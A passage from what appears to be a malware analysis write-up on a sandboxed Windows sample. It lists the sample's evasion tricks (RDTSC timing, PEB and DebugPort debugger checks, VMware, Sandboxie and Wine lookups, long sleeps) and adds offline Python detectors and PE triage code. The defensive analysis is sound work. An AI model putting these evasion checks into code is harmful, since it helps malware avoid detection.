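def parse_pe(image: bytes) -> dict:
    """Read the COFF TimeDateStamp and the raw-data entropy of every section (headers only)."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    _machine, nsections, timestamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", image, coff)
    table = coff + 20 + opt_size            # section table follows the optional header
    sections = []
    for i in range(nsections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, table + 40 * i)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode(), "entropy": shannon_entropy(raw)})
    return {"timestamp": timestamp, "sections": sections}


def triage(image: bytes, now: datetime = ANALYSIS_TIME) -> list:
    """Return the static findings the report lists: a future time stamp and high-entropy sections."""
    info = parse_pe(image)
    built = datetime.fromtimestamp(info["timestamp"], tz=timezone.utc)
    findings = []
    if built > now:
        findings.append(f"suspicious time stamp: 0x{info['timestamp']:08X} [{built:%a %b %d %H:%M:%S %Y} UTC]")
    for s in info["sections"]:
        if s["entropy"] > ENTROPY_THRESHOLD:
            findings.append(f"section {s['name']} entropy: {s['entropy']:.3f}")
    return findings


def build_sample_pe(timestamp: int, text: bytes) -> bytes:
    """Constructed single-section PE32 image: valid enough to parse, not a runnable executable."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt = struct.pack("<H", 0x10B).ljust(224, b"\0")            # PE32 magic, remaining fields zeroed
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, len(opt), 0x0102)
    raw_ptr = e_lfanew + 4 + len(coff) + len(opt) + 40
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + opt + sect + text


# Constructed samples: one mimicking the reported indicators, one plausible benign image.
PACKED_SAMPLE = build_sample_pe(0x87A8763C, bytes(range(256)) * 16)              # 2042 time stamp, entropy 8.0
BENIGN_SAMPLE = build_sample_pe(0x5FEE6600, b"\x55\x8b\xec\x33\xc0\xc3" * 512)   # 2021-01-01, low entropy

if __name__ == "__main__":
    for label, image in (("packed", PACKED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage(image) or ["no static findings"])
```

            Run against a real file, `triage(open(path, "rb").read())` gives the same two findings the sandbox reports for this sample; an entropy near 8.0 in .text is what an encrypted payload decrypted at run time by the Assembly.Load(byte[]) unpacker looks like on disk.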
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Process information set: NOOPENFILEERRORBOX (31 occurrences)
            Source: C:\Windows\SysWOW64\msiexec.exe :: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM_3
            Source: Yara match :: File source: 00000000.00000002.227447533.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match :: File source: Process Memory Space: YvGnm93rap.exe PID: 2396, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msiexec.exe :: RDTSC instruction interceptor: First address: 0000000002E485E4 second address: 0000000002E485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msiexec.exe :: RDTSC instruction interceptor: First address: 0000000002E4897E second address: 0000000002E48984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_004088B0 rdtsc 2_2_004088B0
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\YvGnm93rap.exe TID: 1004 :: Thread sleep time: -31500s >= -30000s
            Source: C:\Users\user\Desktop\YvGnm93rap.exe TID: 2616 :: Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 4604 :: Thread sleep time: -100000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6932 :: Thread sleep count: 38 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6932 :: Thread sleep time: -76000s >= -30000s
            Source: C:\Windows\explorer.exe :: Last function: Thread delayed (2 occurrences)
            Source: C:\Windows\SysWOW64\msiexec.exe :: Last function: Thread delayed (2 occurrences)
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: VMware
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmp :: Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmp :: Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
            Source: explorer.exe, 00000003.00000000.239789779.0000000004DF3000.00000004.00000001.sdmp :: Binary or memory string: #{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&L
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmp :: Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 00000003.00000000.245156332.0000000008640000.00000004.00000001.sdmp :: Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: vmware
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.240164900.00000000055D0000.00000004.00000001.sdmp :: Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: VMWARE
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmp :: Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
            Source: explorer.exe, 00000003.00000000.245297462.000000000871F000.00000004.00000001.sdmp :: Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
            Source: explorer.exe, 00000003.00000000.245453797.00000000087D1000.00000004.00000001.sdmp :: Binary or memory string: VMware SATA CD00ices
            Source: explorer.exe, 00000003.00000003.562890431.0000000005603000.00000004.00000001.sdmp :: Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmp :: Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmp :: Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: VMware
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: VMware SVGA II
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: YvGnm93rap.exe, 00000000.00000002.227501627.0000000003138000.00000004.00000001.sdmp :: Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000003.00000000.244872994.0000000008220000.00000002.00000001.sdmp :: Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Process queried: DebugPort
            Source: C:\Windows\SysWOW64\msiexec.exe :: Process queried: DebugPort
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_004088B0 rdtsc 2_2_004088B0
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00409B20 LdrLoadDll, 2_2_00409B20
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00EF58EC mov eax, dword ptr fs:[00000030h] 2_2_00EF58EC
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00EF40E1 mov eax, dword ptr fs:[00000030h] 2_2_00EF40E1 (3 occurrences)
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00F1B8E4 mov eax, dword ptr fs:[00000030h] 2_2_00F1B8E4 (2 occurrences)
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00F8B8D0 mov eax, dword ptr fs:[00000030h] 2_2_00F8B8D0 (5 occurrences)
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00F8B8D0 mov ecx, dword ptr fs:[00000030h] 2_2_00F8B8D0
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00F2F0BF mov ecx, dword ptr fs:[00000030h] 2_2_00F2F0BF
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00F2F0BF mov eax, dword ptr fs:[00000030h] 2_2_00F2F0BF (2 occurrences)
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00F220A0 mov eax, dword ptr fs:[00000030h] 2_2_00F220A0 (6 occurrences)
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00F390AF mov eax, dword ptr fs:[00000030h] 2_2_00F390AF
            Source: C:\Users\user\Desktop\YvGnm93rap.exe :: Code function: 2_2_00EF9080 mov eax, dword ptr fs:[00000030h] 2_2_00EF9080
            Source: C:\Users\user\Desktop\YvGnm93rap.exe
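            The evasion entries in this section reduce to three machine-checkable artifacts: two rdtsc instructions a few bytes apart (the delta is large when the hypervisor traps rdtsc, which is what the "RDTSC instruction interceptor" lines record), reads of the PEB through fs:[30h] (PEB.BeingDebugged is the byte at offset 2, and the DebugPort queries are the kernel-side variant of the same check), and the Sandboxie, Wine and VMware strings the sample resolves from memory (SbieDll.dll is Sandboxie's injected DLL; wine_get_unix_file_name is a kernel32 export that exists only under Wine). The scanner below is an added example written for this page, not code from the report or from the sandbox vendor; it runs offline over constructed byte strings that reproduce the opcode sequences and strings listed above. The byte patterns, the 16-byte pairing window and the scoring weights are assumptions.

```python
# Constructed test vectors that mirror the listings above (not bytes taken from the sample).
# rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc  -- the timing check reported at 0x4085E4 / 0x4085EA
RDTSC_PAIR = bytes.fromhex("0f31 33c9 03c8 0f31")
# mov eax, dword ptr fs:[30h] ; movzx eax, byte ptr [eax+2]  -- PEB, then PEB.BeingDebugged
PEB_CHECK = bytes.fromhex("64a130000000 0fb64002")
SAMPLE_CODE = b"\x55\x8b\xec" + RDTSC_PAIR + b"\x90\x90" + PEB_CHECK + b"\xc3"

# Constructed memory blob carrying the strings the report extracted from the .sdmp dumps.
SAMPLE_MEMORY = b"\x00".join([
    b"kernel32.dll", b"SBIEDLL.DLL", b"WINE_GET_UNIX_FILE_NAME",
    b"SOFTWARE\\VMware, Inc.\\VMware Tools", b"VMware SVGA II",
    b"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0",
    b"SYSTEM\\ControlSet001\\Services\\Disk\\Enum", b"user32.dll",
])

RDTSC = b"\x0f\x31"
FS_PREFIX = 0x64
PEB_DISP = b"\x30\x00\x00\x00"
# ModRM bytes of "mov r32, [disp32]" for eax, ecx, edx, ebx, esp, ebp, esi, edi
MOV_R32_DISP32 = {0x05, 0x0D, 0x15, 0x1D, 0x25, 0x2D, 0x35, 0x3D}

# Lower-cased because the dumps show the same artifact as VMware, VMWARE and vmware.
ANTI_ANALYSIS = {
    "sandboxie": [b"sbiedll.dll"],
    "wine": [b"wine_get_unix_file_name"],
    "vmware": [b"software\\vmware, inc.\\vmware tools", b"vmware svga ii", b"vmware tools"],
    "disk_enum": [b"hardware\\devicemap\\scsi\\scsi port", b"system\\controlset001\\services\\disk\\enum"],
}


def find_rdtsc_pairs(code: bytes, window: int = 16) -> list:
    """(first, second) offsets of two rdtsc instructions at most `window` bytes apart."""
    offsets = []
    pos = code.find(RDTSC)
    while pos != -1:
        offsets.append(pos)
        pos = code.find(RDTSC, pos + 2)
    return [(a, b) for a, b in zip(offsets, offsets[1:]) if b - a <= window]


def find_peb_reads(code: bytes) -> list:
    """Offsets of 'mov r32, fs:[30h]', the x86 PEB read behind the fs:[00000030h] listings."""
    hits = []
    i = 0
    while i < len(code) - 5:
        if code[i] == FS_PREFIX:
            if code[i + 1] == 0xA1 and code[i + 2:i + 6] == PEB_DISP:        # 64 A1 30 00 00 00
                hits.append(i)
                i += 6
                continue
            if code[i + 1] == 0x8B and code[i + 2] in MOV_R32_DISP32 and code[i + 3:i + 7] == PEB_DISP:
                hits.append(i)                                              # 64 8B /r 30 00 00 00
                i += 7
                continue
        i += 1
    return hits


def find_anti_analysis_strings(memory: bytes) -> dict:
    """Case-insensitive search for the sandbox and hypervisor artifacts the sample looks up."""
    lowered = memory.lower()
    return {cat: [p.decode() for p in pats if p in lowered]
            for cat, pats in ANTI_ANALYSIS.items() if any(p in lowered for p in pats)}


def assess(code: bytes, memory: bytes) -> dict:
    """Combine the three heuristics into one verdict; the weights and cut-off are assumptions."""
    pairs = find_rdtsc_pairs(code)
    pebs = find_peb_reads(code)
    strings = find_anti_analysis_strings(memory)
    score = 2 * len(pairs) + len(pebs) + len(strings)
    return {"rdtsc_pairs": pairs, "peb_reads": pebs, "indicators": strings,
            "score": score, "verdict": "evasive" if score >= 3 else "inconclusive"}


if __name__ == "__main__":
    print(assess(SAMPLE_CODE, SAMPLE_MEMORY))
```

            On a real case feed `find_rdtsc_pairs` and `find_peb_reads` the unpacked code section (the 2.2 stage in this report, since the on-disk .text is encrypted) and `find_anti_analysis_strings` a process memory dump; a single fs:[30h] read is ordinary compiler output, so the score only becomes meaningful when it is combined with the rdtsc pairing or the string hits.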